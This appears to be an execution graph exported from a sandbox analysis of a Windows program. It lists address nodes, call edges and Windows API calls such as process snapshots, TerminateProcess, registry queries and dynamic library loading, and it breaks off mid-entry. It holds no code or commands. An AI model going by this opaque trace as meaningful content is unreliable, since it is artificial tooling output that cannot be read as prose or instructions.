                                    execution_graph 104062 3ce37c 104065 3cb940 104062->104065 104066 3cb95b 104065->104066 104067 410493 104066->104067 104068 410445 104066->104068 104094 3cb980 104066->104094 104136 446029 201 API calls 2 library calls 104067->104136 104071 41044f 104068->104071 104074 41045c 104068->104074 104068->104094 104134 4464ba 201 API calls 104071->104134 104090 3cbc50 104074->104090 104135 446957 201 API calls 2 library calls 104074->104135 104077 410726 104077->104077 104081 3cbc7e 104082 41066f 104140 446393 82 API calls 104082->104140 104089 3cbe10 40 API calls 104089->104094 104090->104081 104141 433d0b 82 API calls __wsopen_s 104090->104141 104091 3de6c0 40 API calls 104091->104094 104094->104081 104094->104082 104094->104089 104094->104090 104094->104091 104096 3cf1e0 104094->104096 104121 3cacbd 40 API calls 104094->104121 104122 3de67a 40 API calls 104094->104122 104123 3da955 201 API calls 104094->104123 104124 3e0592 5 API calls __Init_thread_wait 104094->104124 104125 3dbb11 104094->104125 104130 3e03f3 29 API calls __onexit 104094->104130 104131 3e0548 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 104094->104131 104132 3df33d 82 API calls 104094->104132 104133 3df1a4 201 API calls 104094->104133 104137 3ca35b 22 API calls 104094->104137 104138 41fd46 22 API calls 104094->104138 104139 3cad69 22 API calls __fread_nolock 104094->104139 104116 3cf216 ISource 104096->104116 104097 3e03f3 29 API calls pre_c_initialization 104097->104116 104098 4152b2 104151 433d0b 82 API calls __wsopen_s 104098->104151 104100 3d0535 104111 3cf33d ISource 104100->104111 104147 3cad69 22 API calls __fread_nolock 104100->104147 104102 414c62 104102->104111 104146 3cad69 22 API calls __fread_nolock 104102->104146 104103 4151e1 104150 433d0b 82 API calls __wsopen_s 104103->104150 104109 3cad69 22 API calls 104109->104116 104110 3e0592 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 104110->104116 104111->104094 104112 3e012b 22 API calls 104112->104116 104114 3cae03 22 API calls 104114->104116 104116->104097 104116->104098 104116->104100 104116->104102 104116->104103 104116->104109 104116->104110 104116->104111 104116->104112 104116->104114 104117 3e0548 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 104116->104117 104118 41509c 104116->104118 104120 3cf94e ISource 104116->104120 104142 3d0830 201 API calls 2 library calls 104116->104142 104143 3d0cf0 41 API calls ISource 104116->104143 104144 447db9 54 API calls __wsopen_s 104116->104144 104145 447ef8 66 API calls 104116->104145 104117->104116 104148 433d0b 82 API calls __wsopen_s 104118->104148 104149 433d0b 82 API calls __wsopen_s 104120->104149 104121->104094 104122->104094 104123->104094 104124->104094 104152 3e012b 104125->104152 104127 3dbb1e 104162 3ca1d4 104127->104162 104130->104094 104131->104094 104132->104094 104133->104094 104134->104074 104135->104090 104136->104094 104137->104094 104138->104094 104139->104094 104140->104090 104141->104077 104142->104116 104143->104116 104144->104116 104145->104116 104146->104111 104147->104111 104148->104120 104149->104111 104150->104111 104151->104111 104155 3e0130 104152->104155 104154 3e014a 104154->104127 104155->104154 104157 3e014c 104155->104157 104168 3eed5c 104155->104168 104175 3e51fd 7 API calls 2 library calls 104155->104175 104161 3e09bd 104157->104161 104176 3e35f4 RaiseException 104157->104176 104160 3e09da 104160->104127 104177 3e35f4 RaiseException 104161->104177 104163 3ca1e3 _wcslen 104162->104163 104180 3e015b 104163->104180 104165 3ca20b __fread_nolock 104166 3e012b 22 API calls 104165->104166 104167 3ca221 104166->104167 104167->104094 104173 3f3b70 pre_c_initialization 104168->104173 104169 3f3bae 104179 3f2b68 20 API calls __dosmaperr 104169->104179 104171 3f3b99 RtlAllocateHeap 104172 3f3bac 104171->104172 104171->104173 104172->104155 104173->104169 104173->104171 104178 3e51fd 7 API calls 2 library calls 104173->104178 104175->104155 104176->104161 104177->104160 104178->104173 104179->104172 104182 3e012b 104180->104182 104181 3eed5c ___std_exception_copy 21 API calls 104181->104182 104182->104181 104183 3e014a 104182->104183 104186 3e014c 104182->104186 104190 3e51fd 7 API calls 2 library calls 104182->104190 104183->104165 104185 3e09bd 104192 3e35f4 RaiseException 104185->104192 104186->104185 104191 3e35f4 RaiseException 104186->104191 104189 3e09da 104189->104165 104190->104182 104191->104185 104192->104189 104193 3d049f 104200 3de28e 104193->104200 104195 3d04b5 104209 3de2f2 104195->104209 104197 3d04df 104221 433d0b 82 API calls __wsopen_s 104197->104221 104199 41518e 104201 3de29c 104200->104201 104202 3de2af 104200->104202 104222 3ca35b 22 API calls 104201->104222 104204 3de2b4 104202->104204 104205 3de2e2 104202->104205 104206 3e012b 22 API calls 104204->104206 104223 3ca35b 22 API calls 104205->104223 104208 3de2a6 104206->104208 104208->104195 104224 3c69c4 104209->104224 104211 3de329 104212 3ca1d4 22 API calls 104211->104212 104215 3de35a 104211->104215 104213 41e400 104212->104213 104229 3c6aa4 22 API calls 104213->104229 104215->104197 104216 41e40b 104230 3de67a 40 API calls 104216->104230 104218 41e41e 104220 41e422 104218->104220 104231 3ca35b 22 API calls 104218->104231 104220->104220 104221->104199 104222->104208 104223->104208 104225 3e015b 22 API calls 104224->104225 104226 3c69e9 104225->104226 104227 3e012b 22 API calls 104226->104227 104228 3c69f7 104227->104228 104228->104211 104229->104216 104230->104218 104231->104220 104232 3cfd5f 104233 3cfd73 104232->104233 104239 3d02c5 104232->104239 104234 3e012b 22 API calls 104233->104234 104237 3cfd85 104233->104237 104234->104237 104235 4145b3 104329 43183e 22 API calls 104235->104329 104237->104235 104238 3cfdde 104237->104238 104325 3ca35b 22 API calls 104237->104325 104258 3cf33d ISource 104238->104258 104267 3d19c0 104238->104267 104239->104237 104328 3cad69 22 API calls __fread_nolock 104239->104328 104243 4152b2 104335 433d0b 82 API calls __wsopen_s 104243->104335 104245 3d0535 104245->104258 104331 3cad69 22 API calls __fread_nolock 104245->104331 104247 414c62 104247->104258 104330 3cad69 22 API calls __fread_nolock 104247->104330 104248 4151e1 104334 433d0b 82 API calls __wsopen_s 104248->104334 104254 3e0592 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 104266 3cf216 ISource 104254->104266 104255 3cad69 22 API calls 104255->104266 104257 3cae03 22 API calls 104257->104266 104260 3e03f3 29 API calls pre_c_initialization 104260->104266 104261 3cf94e ISource 104333 433d0b 82 API calls __wsopen_s 104261->104333 104262 41509c 104332 433d0b 82 API calls __wsopen_s 104262->104332 104263 3e0548 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 104263->104266 104265 3e012b 22 API calls 104265->104266 104266->104243 104266->104245 104266->104247 104266->104248 104266->104254 104266->104255 104266->104257 104266->104258 104266->104260 104266->104261 104266->104262 104266->104263 104266->104265 104323 3d0830 201 API calls 2 library calls 104266->104323 104324 3d0cf0 41 API calls ISource 104266->104324 104326 447db9 54 API calls __wsopen_s 104266->104326 104327 447ef8 66 API calls 104266->104327 104268 3d1a26 104267->104268 104269 3d1e60 104267->104269 104270 3d1a40 104268->104270 104271 416b5f 104268->104271 104428 3e0592 5 API calls __Init_thread_wait 104269->104428 104336 3d1fd0 104270->104336 104387 447823 104271->104387 104275 3d1e6a 104276 3d1eab 104275->104276 104279 3ca1d4 22 API calls 104275->104279 104282 416b74 104276->104282 104284 3d1edc 104276->104284 104278 416b6b 104278->104266 104287 3d1e84 104279->104287 104280 3d1fd0 9 API calls 104281 3d1a66 104280->104281 104281->104276 104283 3d1a9c 104281->104283 104433 433d0b 82 API calls __wsopen_s 104282->104433 104283->104282 104308 3d1ab8 __fread_nolock 104283->104308 104430 3ca35b 22 API calls 104284->104430 104429 3e0548 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 104287->104429 104288 416b97 104288->104266 104289 3d1ee9 104431 3de5a1 201 API calls 104289->104431 104292 416b9c 104434 433d0b 82 API calls __wsopen_s 104292->104434 104293 3d1bdf 104295 3d1bec 104293->104295 104296 416bff 104293->104296 104298 3d1fd0 9 API calls 104295->104298 104436 445ecc 54 API calls _wcslen 104296->104436 104299 3d1bf9 104298->104299 104303 416d28 104299->104303 104305 3d1fd0 9 API calls 104299->104305 104300 3e012b 22 API calls 104300->104308 104301 3d1f22 104432 3dfdff 22 API calls 104301->104432 104302 3e015b 22 API calls 104302->104308 104303->104288 104438 433d0b 82 API calls __wsopen_s 104303->104438 104309 3d1c13 104305->104309 104307 3cf1e0 201 API calls 104307->104308 104308->104288 104308->104289 104308->104292 104308->104293 104308->104300 104308->104302 104308->104307 104310 416be0 104308->104310 104309->104303 104314 3d1c77 ISource 104309->104314 104437 3cad69 22 API calls __fread_nolock 104309->104437 104435 433d0b 82 API calls __wsopen_s 104310->104435 104313 3d1fd0 9 API calls 104313->104314 104314->104288 104314->104301 104314->104303 104314->104313 104316 3d1d2b ISource 104314->104316 104346 4363c9 104314->104346 104351 43f674 104314->104351 104360 3daaf7 104314->104360 104379 449d12 104314->104379 104382 44aa71 104314->104382 104315 3d1dcd 104315->104266 104316->104315 104427 3de1db 22 API calls ISource 104316->104427 104323->104266 104324->104266 104325->104237 104326->104266 104327->104266 104328->104237 104329->104258 104330->104258 104331->104258 104332->104261 104333->104258 104334->104258 104335->104258 104337 3d1fed 104336->104337 104338 3d2011 104336->104338 104345 3d1a50 104337->104345 104441 3e0592 5 API calls __Init_thread_wait 104337->104441 104439 3e0592 5 API calls __Init_thread_wait 104338->104439 104341 3d201b 104341->104337 104440 3e0548 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 104341->104440 104342 3d8db7 104342->104345 104442 3e0548 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 104342->104442 104345->104280 104443 3c7e30 104346->104443 104350 4363e6 104350->104314 104352 3e015b 22 API calls 104351->104352 104353 43f685 104352->104353 104474 3c3966 104353->104474 104356 3c7e30 53 API calls 104357 43f6a6 GetEnvironmentVariableW 104356->104357 104477 431339 22 API calls 104357->104477 104359 43f6c3 ISource 104359->104314 104361 3c7e30 53 API calls 104360->104361 104362 3dab21 104361->104362 104363 3dbb11 22 API calls 104362->104363 104364 3dab38 104363->104364 104374 3daf54 _wcslen 104364->104374 104492 3cb81d 39 API calls 104364->104492 104367 3c69c4 22 API calls 104367->104374 104368 3c5a63 22 API calls 104368->104374 104369 3dba77 43 API calls 104369->104374 104372 3db0b4 104372->104314 104373 3c7e30 53 API calls 104373->104374 104374->104367 104374->104368 104374->104369 104374->104372 104374->104373 104376 3cb81d 39 API calls 104374->104376 104478 3c3989 104374->104478 104488 3c2f14 104374->104488 104493 3e4d78 40 API calls 2 library calls 104374->104493 104494 3c9c50 22 API calls __fread_nolock 104374->104494 104495 3c6a09 22 API calls 104374->104495 104496 3c7467 104374->104496 104376->104374 104588 4486e0 104379->104588 104381 449d22 104381->104314 104383 3c7e30 53 API calls 104382->104383 104384 44aa8d 104383->104384 104682 42dac1 CreateToolhelp32Snapshot Process32FirstW 104384->104682 104386 44aa9c 104386->104314 104388 447862 104387->104388 104389 44787c 104387->104389 104714 433d0b 82 API calls __wsopen_s 104388->104714 104703 445e10 104389->104703 104393 3cf1e0 200 API calls 104394 4478eb 104393->104394 104395 447986 104394->104395 104398 447874 104394->104398 104400 44792d 104394->104400 104396 44798c 104395->104396 104397 4479da 104395->104397 104715 431802 22 API calls 104396->104715 104397->104398 104399 3c7e30 53 API calls 104397->104399 104398->104278 104401 4479ec 104399->104401 104405 4311b5 22 API calls 104400->104405 104403 3cb159 22 API calls 104401->104403 104406 447a10 CharUpperBuffW 104403->104406 104404 4479af 104716 3cab97 22 API calls 104404->104716 104408 447965 104405->104408 104411 447a2a 104406->104411 104410 3d19c0 200 API calls 104408->104410 104409 4479b7 104717 3cc210 104409->104717 104410->104398 104412 447a31 104411->104412 104413 447a7d 104411->104413 104710 4311b5 104412->104710 104414 3c7e30 53 API calls 104413->104414 104416 447a85 104414->104416 104783 3da921 23 API calls 104416->104783 104420 3d19c0 200 API calls 104420->104398 104421 447a8f 104421->104398 104422 3c7e30 53 API calls 104421->104422 104423 447aaa 104422->104423 104784 3cab97 22 API calls 104423->104784 104425 447aba 104426 3cc210 200 API calls 104425->104426 104426->104398 104427->104316 104428->104275 104429->104276 104430->104289 104431->104301 104432->104301 104433->104288 104434->104288 104435->104288 104436->104309 104437->104314 104438->104288 104439->104341 104440->104337 104441->104342 104442->104345 104444 3c7e45 104443->104444 104445 3c7e42 104443->104445 104446 3c7e4d 104444->104446 104447 3c7e7b 104444->104447 104466 42e1ac GetFileAttributesW 104445->104466 104470 3e5516 26 API calls 104446->104470 104449 405b50 104447->104449 104452 3c7e8d 104447->104452 104457 405a69 104447->104457 104473 3e54d3 26 API calls 104449->104473 104450 3c7e5d 104456 3e012b 22 API calls 104450->104456 104471 3dfe35 51 API calls 104452->104471 104453 405b68 104453->104453 104458 3c7e67 104456->104458 104460 3e015b 22 API calls 104457->104460 104465 405ae2 104457->104465 104459 3ca1d4 22 API calls 104458->104459 104459->104445 104461 405ab2 104460->104461 104462 3e012b 22 API calls 104461->104462 104463 405ad9 104462->104463 104464 3ca1d4 22 API calls 104463->104464 104464->104465 104472 3dfe35 51 API calls 104465->104472 104467 42e1d8 104466->104467 104468 42e1c7 FindFirstFileW 104466->104468 104467->104350 104468->104467 104469 42e1dc FindClose 104468->104469 104469->104467 104470->104450 104471->104450 104472->104449 104473->104453 104475 3e012b 22 API calls 104474->104475 104476 3c3978 104475->104476 104476->104356 104477->104359 104479 3c39b4 ___scrt_fastfail 104478->104479 104508 3c4dd2 104479->104508 104482 3c3a3a 104484 4039c2 Shell_NotifyIconW 104482->104484 104485 3c3a58 Shell_NotifyIconW 104482->104485 104512 3c5033 104485->104512 104487 3c3a6e 104487->104374 104489 3c2f76 104488->104489 104490 3c2f26 ___scrt_fastfail 104488->104490 104489->104374 104491 3c2f45 Shell_NotifyIconW 104490->104491 104491->104489 104492->104374 104493->104374 104494->104374 104495->104374 104497 3c7477 _wcslen 104496->104497 104498 4055fc 104496->104498 104501 3c748d 104497->104501 104502 3c74b2 104497->104502 104578 3c8635 104498->104578 104500 405605 104500->104500 104577 3c7851 22 API calls 104501->104577 104503 3e012b 22 API calls 104502->104503 104505 3c74be 104503->104505 104507 3e015b 22 API calls 104505->104507 104506 3c7495 __fread_nolock 104506->104374 104507->104506 104509 3c4dee 104508->104509 104510 3c3a09 104508->104510 104509->104510 104511 4040d9 DestroyIcon 104509->104511 104510->104482 104542 42ce59 42 API calls 104510->104542 104511->104510 104513 3c5050 104512->104513 104514 3c5132 104512->104514 104515 3c69c4 22 API calls 104513->104515 104514->104487 104516 3c505e 104515->104516 104517 3c506b 104516->104517 104518 4042ad LoadStringW 104516->104518 104519 3c7467 22 API calls 104517->104519 104521 4042c7 104518->104521 104520 3c5080 104519->104520 104522 3c508d 104520->104522 104530 4042e3 104520->104530 104527 3c50b3 ___scrt_fastfail 104521->104527 104553 3cad69 22 API calls __fread_nolock 104521->104553 104522->104521 104523 3c5097 104522->104523 104543 3c59dc 104523->104543 104529 3c5118 Shell_NotifyIconW 104527->104529 104529->104514 104530->104527 104531 404326 104530->104531 104554 3cae03 104530->104554 104561 3dfe35 51 API calls 104531->104561 104536 404318 104560 3c6aa4 22 API calls 104536->104560 104537 404345 104539 3c59dc 22 API calls 104537->104539 104540 404356 104539->104540 104541 3c59dc 22 API calls 104540->104541 104541->104527 104542->104482 104544 404816 104543->104544 104545 3c59f3 104543->104545 104547 3e012b 22 API calls 104544->104547 104562 3c5a04 104545->104562 104549 404820 _wcslen 104547->104549 104548 3c50a5 104552 3c6aa4 22 API calls 104548->104552 104550 3e015b 22 API calls 104549->104550 104551 404859 __fread_nolock 104550->104551 104552->104527 104553->104527 104555 3e015b 22 API calls 104554->104555 104556 3cae18 104555->104556 104557 3e012b 22 API calls 104556->104557 104558 3cae26 104557->104558 104559 42a08a 23 API calls 104558->104559 104559->104536 104560->104531 104561->104537 104563 3c5a14 _wcslen 104562->104563 104564 404878 104563->104564 104565 3c5a27 104563->104565 104567 3e012b 22 API calls 104564->104567 104572 3c6c63 104565->104572 104569 404882 104567->104569 104568 3c5a34 __fread_nolock 104568->104548 104570 3e015b 22 API calls 104569->104570 104571 4048b2 __fread_nolock 104570->104571 104573 3c6c79 104572->104573 104576 3c6c74 __fread_nolock 104572->104576 104574 405514 104573->104574 104575 3e015b 22 API calls 104573->104575 104575->104576 104576->104568 104577->104506 104579 3c8643 104578->104579 104581 3c864c __fread_nolock 104578->104581 104579->104581 104582 3cb159 104579->104582 104581->104500 104583 3cb16c 104582->104583 104584 3cb169 __fread_nolock 104582->104584 104585 3e012b 22 API calls 104583->104585 104584->104581 104586 3cb177 104585->104586 104587 3e015b 22 API calls 104586->104587 104587->104584 104589 3c7e30 53 API calls 104588->104589 104590 448717 104589->104590 104613 44875c ISource 104590->104613 104626 44945a 104590->104626 104592 448a08 104593 448bd6 104592->104593 104598 448a16 104592->104598 104668 44966b 60 API calls 104593->104668 104596 448be5 104597 448bf1 104596->104597 104596->104598 104597->104613 104639 44860d 104598->104639 104599 3c7e30 53 API calls 104617 4487d0 104599->104617 104604 448a4f 104654 3dffc0 104604->104654 104607 448a6f 104661 433d0b 82 API calls __wsopen_s 104607->104661 104608 448a89 104662 3c6d01 22 API calls 104608->104662 104611 448a7a GetCurrentProcess TerminateProcess 104611->104608 104612 448a98 104663 3c7360 22 API calls 104612->104663 104613->104381 104615 448ab1 104624 448ad9 104615->104624 104664 3d0b40 22 API calls 104615->104664 104617->104592 104617->104599 104617->104613 104659 424868 22 API calls __fread_nolock 104617->104659 104660 448ca4 42 API calls 104617->104660 104618 448c4c 104618->104613 104622 448c60 FreeLibrary 104618->104622 104619 448ac8 104665 449302 75 API calls 104619->104665 104622->104613 104624->104618 104666 3d0b40 22 API calls 104624->104666 104667 3ca35b 22 API calls 104624->104667 104669 449302 75 API calls 104624->104669 104627 3cb159 22 API calls 104626->104627 104628 449475 CharLowerBuffW 104627->104628 104670 42954d 104628->104670 104632 3cae03 22 API calls 104633 4494b1 104632->104633 104677 3c7642 22 API calls __fread_nolock 104633->104677 104635 4494c5 104636 3c8635 22 API calls 104635->104636 104637 4494cf _wcslen 104636->104637 104638 4495e5 _wcslen 104637->104638 104678 448ca4 42 API calls 104637->104678 104638->104617 104640 448628 104639->104640 104644 448673 104639->104644 104641 3e015b 22 API calls 104640->104641 104642 44864a 104641->104642 104643 3e012b 22 API calls 104642->104643 104642->104644 104643->104642 104645 44981d 104644->104645 104646 449a32 ISource 104645->104646 104653 449841 _strcat _wcslen 104645->104653 104646->104604 104647 3cb4cf 39 API calls 104647->104653 104648 3cb8eb 39 API calls 104648->104653 104649 3cb81d 39 API calls 104649->104653 104650 3c7e30 53 API calls 104650->104653 104651 3eed5c 21 API calls ___std_exception_copy 104651->104653 104653->104646 104653->104647 104653->104648 104653->104649 104653->104650 104653->104651 104681 42f5ef 24 API calls _wcslen 104653->104681 104655 3dffd5 104654->104655 104656 3e006d CreateToolhelp32Snapshot 104655->104656 104657 3e005b FindCloseChangeNotification 104655->104657 104658 3e003b 104655->104658 104656->104658 104657->104658 104658->104607 104658->104608 104659->104617 104660->104617 104661->104611 104662->104612 104663->104615 104664->104619 104665->104624 104666->104624 104667->104624 104668->104596 104669->104624 104671 42956d _wcslen 104670->104671 104672 42965c 104671->104672 104673 429661 104671->104673 104674 4295a2 104671->104674 104672->104632 104672->104637 104673->104672 104680 3de224 41 API calls 104673->104680 104674->104672 104679 3de224 41 API calls 104674->104679 104677->104635 104678->104638 104679->104674 104680->104673 104681->104653 104692 42e538 104682->104692 104684 42dbc0 FindCloseChangeNotification 104684->104386 104685 42db0e Process32NextW 104685->104684 104690 42db07 104685->104690 104686 3cae03 22 API calls 104686->104690 104687 3ca1d4 22 API calls 104687->104690 104690->104684 104690->104685 104690->104686 104690->104687 104698 3c3e34 22 API calls 104690->104698 104699 3c6aa4 22 API calls 104690->104699 104700 3de224 41 API calls 104690->104700 104696 42e543 104692->104696 104693 42e55a 104702 3e664b 39 API calls 104693->104702 104696->104693 104697 42e560 104696->104697 104701 3e6702 GetStringTypeW 104696->104701 104697->104690 104698->104690 104699->104690 104700->104690 104701->104696 104702->104697 104704 445e2b 104703->104704 104709 445e79 104703->104709 104705 3e015b 22 API calls 104704->104705 104706 445e4d 104705->104706 104707 3e012b 22 API calls 104706->104707 104706->104709 104785 43112a 22 API calls 104706->104785 104707->104706 104709->104393 104711 4311c3 104710->104711 104713 4311fc 104710->104713 104712 3e012b 22 API calls 104711->104712 104711->104713 104712->104713 104713->104420 104714->104398 104715->104404 104716->104409 104755 3cc26e 104717->104755 104786 3cb080 23 API calls ISource 104717->104786 104719 3ccf90 104789 433d0b 82 API calls __wsopen_s 104719->104789 104721 4108ff 104721->104398 104723 410a04 104724 410949 104733 410a09 104724->104733 104736 4109ad 104724->104736 104746 410907 104724->104746 104725 410ab7 104725->104723 104731 3cc3c5 104725->104731 104796 445ecc 54 API calls _wcslen 104725->104796 104726 410f1b 104726->104723 104807 433d0b 82 API calls __wsopen_s 104726->104807 104727 3cc3b6 104727->104725 104727->104731 104794 427819 22 API calls __fread_nolock 104727->104794 104728 3ccd46 104737 3e015b 22 API calls 104728->104737 104731->104726 104738 3e012b 22 API calls 104731->104738 104745 3cc443 104731->104745 104792 433d0b 82 API calls __wsopen_s 104733->104792 104734 410a66 104795 427792 22 API calls __fread_nolock 104734->104795 104790 3de5a1 201 API calls 104736->104790 104752 3ccd74 __fread_nolock 104737->104752 104740 3cc419 104738->104740 104740->104745 104787 3cb1bd 22 API calls 104740->104787 104742 410ae8 104742->104731 104797 427819 22 API calls __fread_nolock 104742->104797 104743 410a90 104748 3cf1e0 201 API calls 104743->104748 104750 410ba2 104745->104750 104774 3cc467 ISource __fread_nolock 104745->104774 104798 3cb23b 22 API calls ISource 104745->104798 104746->104723 104791 433d0b 82 API calls __wsopen_s 104746->104791 104747 3e012b 22 API calls 104747->104755 104748->104725 104749 3e015b 22 API calls 104749->104774 104754 410bb3 104750->104754 104799 3cb23b 22 API calls ISource 104750->104799 104752->104749 104754->104774 104800 3db96b 22 API calls ISource 104754->104800 104755->104719 104755->104723 104755->104724 104755->104727 104755->104728 104755->104736 104755->104746 104755->104747 104755->104752 104759 3cf1e0 201 API calls 104755->104759 104761 410a2c 104755->104761 104755->104774 104759->104755 104760 410d46 104763 3cf1e0 201 API calls 104760->104763 104793 433d0b 82 API calls __wsopen_s 104761->104793 104765 410d70 104763->104765 104765->104723 104803 3cacbd 40 API calls 104765->104803 104766 410d9b 104804 433d0b 82 API calls __wsopen_s 104766->104804 104770 3e012b 22 API calls 104770->104774 104771 3e015b 22 API calls 104771->104774 104772 3ca35b 22 API calls 104772->104774 104773 410f00 104806 425443 22 API calls ISource 104773->104806 104774->104719 104774->104726 104774->104746 104774->104760 104774->104766 104774->104770 104774->104771 104774->104772 104774->104773 104775 3cbe10 40 API calls 104774->104775 104777 3cad69 22 API calls 104774->104777 104778 3cb23b 22 API calls 104774->104778 104779 3ccaa9 104774->104779 104781 3cc83c ISource 104774->104781 104801 42f69d 40 API calls 104774->104801 104802 3cae35 40 API calls 104774->104802 104805 433978 22 API calls 104774->104805 104775->104774 104777->104774 104778->104774 104779->104398 104780 3cc853 104780->104398 104781->104780 104788 3de1c3 22 API calls ISource 104781->104788 104783->104421 104784->104425 104785->104706 104786->104755 104787->104745 104788->104781 104789->104721 104790->104746 104791->104723 104792->104723 104793->104723 104794->104734 104795->104743 104796->104742 104797->104742 104798->104750 104799->104754 104800->104774 104801->104774 104802->104774 104803->104766 104804->104723 104805->104774 104806->104726 104807->104723 104808 3c1098 104813 3c4e68 104808->104813 104812 3c10a7 104814 3cae03 22 API calls 104813->104814 104815 3c4e7f GetVersionExW 104814->104815 104816 3c7467 22 API calls 104815->104816 104817 3c4ecc 104816->104817 104818 3c8635 22 API calls 104817->104818 104827 3c4f02 104817->104827 104819 3c4ef6 104818->104819 104834 3c699d 104819->104834 104821 3c4fa6 GetCurrentProcess IsWow64Process 104822 3c4fc2 104821->104822 104823 3c4fda LoadLibraryA 104822->104823 104824 40429e GetSystemInfo 104822->104824 104825 3c4feb GetProcAddress 104823->104825 104826 3c5027 GetSystemInfo 104823->104826 104825->104826 104829 3c4ffb GetNativeSystemInfo 104825->104829 104830 3c5001 104826->104830 104827->104821 104828 404259 104827->104828 104829->104830 104831 3c109d 104830->104831 104832 3c5005 FreeLibrary 104830->104832 104833 3e03f3 29 API calls __onexit 104831->104833 104832->104831 104833->104812 104835 3c69ab 104834->104835 104836 3c8635 22 API calls 104835->104836 104837 3c69bf 104836->104837 104837->104827 104838 3c2f78 104841 3c2f92 104838->104841 104842 3c2fa9 104841->104842 104843 3c300d 104842->104843 104844 3c2fae 104842->104844 104885 3c300b 104842->104885 104848 403084 104843->104848 104849 3c3013 104843->104849 104845 3c2fbb 104844->104845 104846 3c3087 PostQuitMessage 104844->104846 104850 4030f1 104845->104850 104851 3c2fc6 104845->104851 104853 3c2f8c 104846->104853 104847 3c2ff2 DefWindowProcW 104847->104853 104896 3c4286 10 API calls 104848->104896 104854 3c303f SetTimer RegisterWindowMessageW 104849->104854 104855 3c301a 104849->104855 104899 42c631 66 API calls ___scrt_fastfail 104850->104899 104856 3c2fd0 104851->104856 104857 3c3091 104851->104857 104854->104853 104858 3c3068 CreatePopupMenu 104854->104858 104861 403025 104855->104861 104862 3c3023 KillTimer 104855->104862 104863 4030d6 104856->104863 104864 3c2fdb 104856->104864 104886 3dfc73 104857->104886 104858->104853 104860 4030a5 104897 3df09a 41 API calls 104860->104897 104868 403060 MoveWindow 104861->104868 104869 40302a 104861->104869 104870 3c2f14 Shell_NotifyIconW 104862->104870 104863->104847 104898 4211b9 22 API calls 104863->104898 104872 3c3075 104864->104872 104873 3c2fe6 104864->104873 104865 403103 104865->104847 104865->104853 104868->104853 104874 403030 104869->104874 104875 40304f SetFocus 104869->104875 104871 3c3036 104870->104871 104893 3c47a8 DeleteObject DestroyWindow 104871->104893 104894 3c30a2 76 API calls ___scrt_fastfail 104872->104894 104873->104847 104882 3c2f14 Shell_NotifyIconW 104873->104882 104874->104873 104879 403039 104874->104879 104875->104853 104895 3c4286 10 API calls 104879->104895 104881 3c3085 104881->104853 104883 4030ca 104882->104883 104884 3c3989 61 API calls 104883->104884 104884->104885 104885->104847 104887 3dfc8b ___scrt_fastfail 104886->104887 104888 3dfd11 104886->104888 104889 3c5033 56 API calls 104887->104889 104888->104853 104891 3dfcb2 104889->104891 104890 3dfcfa KillTimer SetTimer 104890->104888 104891->104890 104892 41fbc2 Shell_NotifyIconW 104891->104892 104892->104890 104893->104853 104894->104881 104895->104853 104896->104860 104897->104873 104898->104885 104899->104865 104900 3c105b 104905 3c3ae4 104900->104905 104902 3c106a 104936 3e03f3 29 API calls __onexit 104902->104936 104904 3c1074 104906 3c3af4 __wsopen_s 104905->104906 104907 3cae03 22 API calls 104906->104907 104908 3c3baa 104907->104908 104937 3c3dd1 104908->104937 104910 3c3bb3 104944 3c3a75 104910->104944 104913 3c59dc 22 API calls 104914 3c3bcc 104913->104914 104950 3c58dc 104914->104950 104917 3cae03 22 API calls 104918 3c3be4 104917->104918 104956 3cabe7 104918->104956 104921 4039cf RegQueryValueExW 104922 403a65 RegCloseKey 104921->104922 104923 4039ec 104921->104923 104925 3c3c0f 104922->104925 104933 403a77 _wcslen 104922->104933 104924 3e015b 22 API calls 104923->104924 104926 403a05 104924->104926 104925->104902 104927 3c3966 22 API calls 104926->104927 104928 403a10 RegQueryValueExW 104927->104928 104930 403a2d 104928->104930 104932 403a47 ISource 104928->104932 104929 3c53e8 22 API calls 104929->104933 104931 3c7467 22 API calls 104930->104931 104931->104932 104932->104922 104933->104925 104933->104929 104934 3ca1d4 22 API calls 104933->104934 104935 3c58dc 22 API calls 104933->104935 104934->104933 104935->104933 104936->104904 104962 4022a0 104937->104962 104940 3ca1d4 22 API calls 104941 3c3e04 104940->104941 104964 3c3ff7 104941->104964 104943 3c3e0e 104943->104910 104945 4022a0 __wsopen_s 104944->104945 104946 3c3a82 GetFullPathNameW 104945->104946 104947 3c3aa4 104946->104947 104948 3c7467 22 API calls 104947->104948 104949 3c3ac2 104948->104949 104949->104913 104951 3c590c __fread_nolock 104950->104951 104952 3c58eb 104950->104952 104953 3e012b 22 API calls 104951->104953 104955 3e015b 22 API calls 104952->104955 104954 3c3bdb 104953->104954 104954->104917 104955->104951 104957 3cac01 104956->104957 104961 3c3bed RegOpenKeyExW 104956->104961 104958 3e012b 22 API calls 104957->104958 104959 3cac0b 104958->104959 104960 3e015b 22 API calls 104959->104960 104960->104961 104961->104921 104961->104925 104963 3c3dde GetModuleFileNameW 104962->104963 104963->104940 104965 4022a0 __wsopen_s 104964->104965 104966 3c4004 GetFullPathNameW 104965->104966 104967 3c403e 104966->104967 104968 3c4023 104966->104968 104970 3cabe7 22 API calls 104967->104970 104969 3c7467 22 API calls 104968->104969 104971 3c402f 104969->104971 104970->104971 104972 3c699d 22 API calls 104971->104972 104973 3c403b 104972->104973 104973->104943 104974 3f8752 104979 3f850e 104974->104979 104977 3f877a 104980 3f853f try_get_first_available_module 104979->104980 104987 3f8688 104980->104987 104994 3e915b 40 API calls 2 library calls 104980->104994 104982 3f873e 104998 3f2aac 26 API calls __cftof 104982->104998 104984 3f8693 104984->104977 104991 400cd7 104984->104991 104986 3f86dc 104986->104987 104995 3e915b 40 API calls 2 library calls 104986->104995 104987->104984 104997 3f2b68 20 API calls __dosmaperr 104987->104997 104989 3f86fb 104989->104987 104996 3e915b 40 API calls 2 library calls 104989->104996 104999 4003d4 104991->104999 104993 400cf2 104993->104977 104994->104986 104995->104989 104996->104987 104997->104982 104998->104984 105002 4003e0 ___DestructExceptionObject 104999->105002 105000 4003ee 105057 3f2b68 20 API 